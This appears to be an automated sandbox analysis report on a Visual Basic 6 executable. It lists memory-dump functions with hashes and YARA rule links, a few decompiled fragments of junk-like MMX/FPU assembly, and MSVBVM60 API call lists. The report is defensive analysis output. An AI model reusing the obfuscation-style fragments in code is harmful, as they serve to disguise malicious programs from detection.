Opcode ID: 8771ae81ec91cd71347673b4a443e127464992779dcc3bfacdb6fdcaa0c8a2b3
Instruction ID: d99d3e92698e7923194409be5d41118534886c2bddccb7e07682c9099e6eefe2
Opcode Fuzzy Hash: 8771ae81ec91cd71347673b4a443e127464992779dcc3bfacdb6fdcaa0c8a2b3
Instruction Fuzzy Hash: E1326842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054C9, Relevance: .9, Instructions: 889
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E004054C9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t9;
				void* _t12;
				void* _t14;

				_t14 = __eflags;
				_t12 = __edi;
				_t9 = __ecx;
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t14 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054c9
0x004054c9
0x004054c9
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e2736d676cdf67d006e37d7dd6fb8af053029374e8503603556721182ac030
Instruction ID: 01dc1c9c093f2657faab68b5260e7fe170025b1b89362eb1f2eefe2f0908b78b
Opcode Fuzzy Hash: 30e2736d676cdf67d006e37d7dd6fb8af053029374e8503603556721182ac030
Instruction Fuzzy Hash: 94325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054B5, Relevance: .9, Instructions: 889
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004054B5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t9;
				void* _t12;
				void* _t15;

				_t12 = __edi;
				_t9 = __ecx;
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t15 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054b5
0x004054b5
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1124e005d45e2c3f7fc53c96764f6f09e3a9e925a5ff706fbf551660b4dcf917
Instruction ID: d0690f9cdfe53056a67288fd6b3faa03ba2970099b6e43da36d7d6a00edf85c0
Opcode Fuzzy Hash: 1124e005d45e2c3f7fc53c96764f6f09e3a9e925a5ff706fbf551660b4dcf917
Instruction Fuzzy Hash: 09326842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054B9, Relevance: .9, Instructions: 887COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47fafc522ee3d088a98a97f5f100045e88abadeb769fa45f6c95e8732ff6f795
Instruction ID: 85267d81e3b2df85ecfa19297e4ab4563ea4e4ffe76b4abdec24b5d664be1852
Opcode Fuzzy Hash: 47fafc522ee3d088a98a97f5f100045e88abadeb769fa45f6c95e8732ff6f795
Instruction Fuzzy Hash: 56326842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 004054BB, Relevance: .9, Instructions: 886COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8ba6066544ee70ef661496e5f4ff6ab2fd8ec9d6c0cf66d2cbc8d74e554254
Instruction ID: 7078d8431936be29eb6c964c2b74887e6b298fb6eba196fc7e9d3551e249a26f
Opcode Fuzzy Hash: 9b8ba6066544ee70ef661496e5f4ff6ab2fd8ec9d6c0cf66d2cbc8d74e554254
Instruction Fuzzy Hash: D9326842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054BD, Relevance: .9, Instructions: 885COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82394f564405857c7bc23a51ea1bb070fc124415d71c45a3cd92e90918e62cff
Instruction ID: c65f2e92debb48ea45ce8534a915c1b09497b5023105cbc3fb4c4741cb53859c
Opcode Fuzzy Hash: 82394f564405857c7bc23a51ea1bb070fc124415d71c45a3cd92e90918e62cff
Instruction Fuzzy Hash: 78326842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040553D, Relevance: .9, Instructions: 874COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d5e9de1e268223b6bce1ad191c6cefc022691937e33c8fbb8dfbf7f8f1a0b03
Instruction ID: 5630bd7339b7d6adee65827aaca0619bb534d78b2de62b47644d165b2ab1c02b
Opcode Fuzzy Hash: 9d5e9de1e268223b6bce1ad191c6cefc022691937e33c8fbb8dfbf7f8f1a0b03
Instruction Fuzzy Hash: 7A324842E2E701C8F6932030C2507665655DF67382E32CB7B9C2BB15E53B3F4A5B299E

Uniqueness

Uniqueness Score: -1.00%

Function 0040556C, Relevance: .9, Instructions: 866COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2296fb1d8cf0ba9dc839515eb38f21783f56e256750f961f14db4a6266e0216c
Instruction ID: 6c0790ace2ab25a766c30167c3c5bbd9b5f70739c0ec50bd6d1f5c8b5ec314c5
Opcode Fuzzy Hash: 2296fb1d8cf0ba9dc839515eb38f21783f56e256750f961f14db4a6266e0216c
Instruction Fuzzy Hash: 19325842E2E701C8F6932020C2507665555DF67382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004055EA, Relevance: .9, Instructions: 853COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3ac9616445341f2fec2c400952d47e2fb3fdbdacfc68c0a2ae7ebf0a349132
Instruction ID: 383bcbf9c8b1a4f31e690cab06f38eabeb75c11ecc3ee7adc210a980ce095e1a
Opcode Fuzzy Hash: 9d3ac9616445341f2fec2c400952d47e2fb3fdbdacfc68c0a2ae7ebf0a349132
Instruction Fuzzy Hash: FC324742E2E701C8F6932030C2507665655DF67382E32CB7B9C2B715E57B3F4A5B29CA

Uniqueness

Uniqueness Score: -1.00%

Function 0040561E, Relevance: .8, Instructions: 848COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10e7b3696676791076f72eb209effe722d306857bcb99692948b59183dfbbde
Instruction ID: fa19ec7e30ad3b40792493504f7b7b13dd86388c6455f71cb4a1766ef4ad1aa1
Opcode Fuzzy Hash: c10e7b3696676791076f72eb209effe722d306857bcb99692948b59183dfbbde
Instruction Fuzzy Hash: B6324742E2E701C8F6932020C2507665655DF67382E32CB7B9C2BB15E53B3F4A5B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE, Relevance: .8, Instructions: 840COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 098dbc3a97e46f64da5f80e53d3521e398f736ff1ecd16a6ecfe801a00347612
Instruction ID: f289984db716ea3bc415e3efa655a6c6e390f83d546c122bf0a496612d84f965
Opcode Fuzzy Hash: 098dbc3a97e46f64da5f80e53d3521e398f736ff1ecd16a6ecfe801a00347612
Instruction Fuzzy Hash: 85224742E2E701C8F6932020C2507665555DF67382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 00405682, Relevance: .8, Instructions: 837COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d137b25cb3e26755ed10cc48e09eca8f7aeda3b4d8fb62dea44ea09eae9b19a7
Instruction ID: a33cf383961a7f4e7fde2272a66c47db460fb280b26ece943c6287ff823d2442
Opcode Fuzzy Hash: d137b25cb3e26755ed10cc48e09eca8f7aeda3b4d8fb62dea44ea09eae9b19a7
Instruction Fuzzy Hash: 92224742E2E701C8F6932020C2507665655DF67382E32CB7B9C2BB15E53B3F4A5B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040576D, Relevance: .8, Instructions: 824COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117dfef1c6173b3977d27779e0f41f2e98299ce38bd1cde1f6245e0ffb297926
Instruction ID: 63cb69399b9ce49f898c892ffa7439fa32a0ed13ab97342df33ac50143c39802
Opcode Fuzzy Hash: 117dfef1c6173b3977d27779e0f41f2e98299ce38bd1cde1f6245e0ffb297926
Instruction Fuzzy Hash: 10224842E2E701C8F6932020C2507665655DF67382E32CB7B9C2BB15E57B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040579A, Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca1cfe20e08db275e08ce7b0c5304804ae987a32c2b0829448f97c89480e280
Instruction ID: 4216289a8535182d7bf7398f5d9c1b9fc27c5f1bc7fc9b8ec7d1586b7a08999f
Opcode Fuzzy Hash: bca1cfe20e08db275e08ce7b0c5304804ae987a32c2b0829448f97c89480e280
Instruction Fuzzy Hash: 53224842E2E701C8F6932021C2507665655DF63382E32CB7B9C2BB15E57B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 004057C0, Relevance: .8, Instructions: 812COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7448d58a025a20dde6d33c5837d277ed9c4267e8dad5c81277c0db358c197d
Instruction ID: 143e60f07755936216db7917ad314ed062f7472b9bc72cd4981760dc4b07cebf
Opcode Fuzzy Hash: 0c7448d58a025a20dde6d33c5837d277ed9c4267e8dad5c81277c0db358c197d
Instruction Fuzzy Hash: 46225742E2E701C8F6932021C2507665655DF67382E32CB7B9C2BB15E53B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00405814, Relevance: .8, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4d93be5d10dfb4d463fb5a806a72d6d75962a29ce2146efb00ec65de5a5525
Instruction ID: beb10ee863bd30a65434b2a1558d4ebe55f3b556dd34e11f12f83391061c97f0
Opcode Fuzzy Hash: 2c4d93be5d10dfb4d463fb5a806a72d6d75962a29ce2146efb00ec65de5a5525
Instruction Fuzzy Hash: F3224842E2E701D8F6932021C2507665655DF63382E32CB7B9C2BB15E53B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00405750, Relevance: .8, Instructions: 802COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a8ca6b0c0d3842e8a10426adbbabfb2592932f2d99b9193dd74283e4c59cd9
Instruction ID: f2a0cfc73f72cf6f9d079a6beb6dcc3aeb4db0588423c1112711c7b7f64dec78
Opcode Fuzzy Hash: 31a8ca6b0c0d3842e8a10426adbbabfb2592932f2d99b9193dd74283e4c59cd9
Instruction Fuzzy Hash: 26224742E2E701C8F6932020C2507665555DF67382E32CB7B9C2BB15E53B3F4A9B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00405872, Relevance: .8, Instructions: 786COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ebee5cc66867155593818d1694a7bd83a6e0477fe2a712b4279ebe84fef6b3e
Instruction ID: 128039f440331e0255a80e6fc0427e1a4c4c63926f181e07476def7d2c5ca1c3
Opcode Fuzzy Hash: 0ebee5cc66867155593818d1694a7bd83a6e0477fe2a712b4279ebe84fef6b3e
Instruction Fuzzy Hash: 44225842E2E701D8F6932020C2507665655DF63382E32CB7B9C2BB15E53B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 004057EF, Relevance: .8, Instructions: 784COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53010dfdc39fe3198eaa69a469467f16552dda723f05ec9ce6e08add8d306c0
Instruction ID: d1ca852bddb1510704b96b05b9fe63628516b1160395513bd9a03906ecbe1e3f
Opcode Fuzzy Hash: a53010dfdc39fe3198eaa69a469467f16552dda723f05ec9ce6e08add8d306c0
Instruction Fuzzy Hash: 9A224752E2E701C8F6932020C2507665655DF63382E32CB7B9C2BB15E57B3F4A5B298E

Uniqueness

Uniqueness Score: -1.00%

Function 004058F7, Relevance: .8, Instructions: 768
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E004058F7(intOrPtr* __eax, void* __ebx, void* __edx) {
				intOrPtr _t3;

				if(__edx + 1 < 0) {
					L4:
					asm("fldl2e");
					asm("psrlw xmm4, 0x9d");
					asm("psubusb mm5, mm3");
					asm("pxor mm2, mm6");
					return _t3;
				}
				asm("pand mm4, mm0");
				asm("fldl2e");
				_t3 =  *__eax;
				asm("paddb mm0, mm5");
				asm("faddp st2, st0");
				asm("fldl2t");
				goto L4;
			}

0x004058f8
0x00405919
0x00405919
0x0040591b
0x00405920
0x00405923
0x00000000
0x00405941
0x004058c0
0x004058c3
0x004058ea
0x004058ec
0x004058ef
0x004058f1
0x00000000

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495d2600e8e019c7a43eb2fdf6af8b90404273fdd53c7f98866fa4d5bb566700
Instruction ID: bb43074871a60dc372665a18c3f10c40d1bfc2fcfd1b0e5b1a97ac0fd30015b5
Opcode Fuzzy Hash: 495d2600e8e019c7a43eb2fdf6af8b90404273fdd53c7f98866fa4d5bb566700
Instruction Fuzzy Hash: 2A225742E2E701D8F6932020C2507665655DF63382E32CB7B9C2BB15E57B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040589C, Relevance: .8, Instructions: 768COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a23885850e3abe7f07895183f6a8fd5385b6e9d09de3f5a856dfaa8cab25b02
Instruction ID: 09ae592bb1ec406786c647dadd2a7ff76acdcf61402887245e7c581d7ac60142
Opcode Fuzzy Hash: 7a23885850e3abe7f07895183f6a8fd5385b6e9d09de3f5a856dfaa8cab25b02
Instruction Fuzzy Hash: 7B225742E2E701D8F6932020C2507665655DF63382E32CB7B9C2BB15E57B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 004058CB, Relevance: .8, Instructions: 767COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b282c337437720e7a5ec6e4c5bda5bf44f808da11c92f5393ef97af93ddf34d1
Instruction ID: 7ff6fdb5b7efaf0da7ef90c9353b86884eb0d05513ad6096637d8a352d19ef43
Opcode Fuzzy Hash: b282c337437720e7a5ec6e4c5bda5bf44f808da11c92f5393ef97af93ddf34d1
Instruction Fuzzy Hash: 3E123642E2E701D8F6932020C2507665655DF63382E32CB7B9C2BB15E57B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00405954, Relevance: .7, Instructions: 742COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68030c2045085f281f802eabb54623977229058cd0d21e9f5f4bc18ce9191558
Instruction ID: 62d70aa90642e6f33d1e81e7ecab10f71c07fcb67a72eec7c3d53b448b01eea3
Opcode Fuzzy Hash: 68030c2045085f281f802eabb54623977229058cd0d21e9f5f4bc18ce9191558
Instruction Fuzzy Hash: 49125942E2E701D4F6A32020C2507665555DF63382E32CB7B9C2BB15E57B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00405A06, Relevance: .7, Instructions: 735COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbffb2a1b6ac54151c31e31e255d47065e9d8a3c2609b462f9fd6601c0a25556
Instruction ID: 7daa2e82b3cae07f61b2c501806919f145862647721d858a4bc8cb9b0eba9f2d
Opcode Fuzzy Hash: dbffb2a1b6ac54151c31e31e255d47065e9d8a3c2609b462f9fd6601c0a25556
Instruction Fuzzy Hash: 02124642E2E701D8F6932020C2507665655DF63382E32CB7B9C2BB15E57B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402C01, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc3c86f4eca12c52542c53188910af705e07f9291d2c6c7f768d718089e1ed9
Instruction ID: 1e706b30b5d04928b76b9d754f0c829eaf49c6d3760f37841b9968f7b6fef5c1
Opcode Fuzzy Hash: 3cc3c86f4eca12c52542c53188910af705e07f9291d2c6c7f768d718089e1ed9
Instruction Fuzzy Hash: D7014F319181F08FCF52CBB8C8D8642BBB5BF1F30074658D5D8406F069C6647820EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00413210, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041325C
__vbaVarDup.MSVBVM60 ref: 0041326E
__vbaVarDup.MSVBVM60 ref: 00413276
#671.MSVBVM60(00000000,00000000,00000000,40000000,00000000,40000000), ref: 00413286
__vbaFpR8.MSVBVM60 ref: 0041328C
__vbaVarDup.MSVBVM60 ref: 004132B3
#667.MSVBVM60(?), ref: 004132B9
__vbaStrMove.MSVBVM60 ref: 004132C4
__vbaFreeVar.MSVBVM60 ref: 004132CD
#541.MSVBVM60(?,2:2:2), ref: 004132DC
__vbaStrVarMove.MSVBVM60(?), ref: 004132E6
__vbaStrMove.MSVBVM60 ref: 004132F1
__vbaFreeVar.MSVBVM60 ref: 004132FA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000254), ref: 0041331F
__vbaFreeStr.MSVBVM60(0041335D), ref: 00413340
__vbaFreeStr.MSVBVM60 ref: 00413345
__vbaFreeVar.MSVBVM60 ref: 00413350
__vbaFreeStr.MSVBVM60 ref: 00413355
__vbaFreeVar.MSVBVM60 ref: 0041335A

Strings

Velbaaren, xrefs: 004132A5
2:2:2, xrefs: 004132D3

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#541#667#671CheckCopyHresult
String ID: 2:2:2$Velbaaren
API String ID: 504220352-936174853
Opcode ID: b4e60e52e5c5c3d5b24ae5001c1272acb17dd236482d6e8ef0211e1ef6650761
Instruction ID: 03f42edc19d87d33bcc3c4e5dbb74fc17e278ad983180d595658ddbfb81672bb
Opcode Fuzzy Hash: b4e60e52e5c5c3d5b24ae5001c1272acb17dd236482d6e8ef0211e1ef6650761
Instruction Fuzzy Hash: D4410871C002499BCB04DF95DE48ADEBBB8FF94305F10802AE542B7264DB742A89CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004134D0, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,004011A8,00411C4C,00000190), ref: 0041354D
__vbaLateIdCallLd.MSVBVM60(?,?,00000005,00000000), ref: 00413562
__vbaI4Var.MSVBVM60(00000000), ref: 0041356C
__vbaFreeObj.MSVBVM60 ref: 00413575
__vbaFreeVar.MSVBVM60 ref: 0041357E
__vbaVarDup.MSVBVM60 ref: 004135A3
#629.MSVBVM60(?,?,00000001,?), ref: 004135B7
__vbaVarTstNe.MSVBVM60(?,?), ref: 004135DC
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 004135F3
#570.MSVBVM60(000000C8), ref: 00413606
__vbaNew2.MSVBVM60(00411E18,00416E2C), ref: 0041361E
__vbaHresultCheckObj.MSVBVM60(00000000,0211ECFC,00411E08,00000014), ref: 00413643
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E28,000000B8), ref: 0041366C
__vbaFreeObj.MSVBVM60 ref: 00413671

Strings

FGFG, xrefs: 00413595

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#570#629CallLateListNew2
String ID: FGFG
API String ID: 3758171355-2759163656
Opcode ID: 76847dda26e45822c7a4b77a5a2c572d4e39506efd449aa96e36c57261c949c5
Instruction ID: 5c04774a253695472759bc5842f542c34b0e2818b3ffe983af6c46e4d30f128c
Opcode Fuzzy Hash: 76847dda26e45822c7a4b77a5a2c572d4e39506efd449aa96e36c57261c949c5
Instruction Fuzzy Hash: 6F515A71901208AFDB10DFA5CE48EDEBBB9EF98701F20805AF609B7260D7745A45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00413380, Relevance: 12.1, APIs: 8, Instructions: 94COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000048), ref: 004133D9
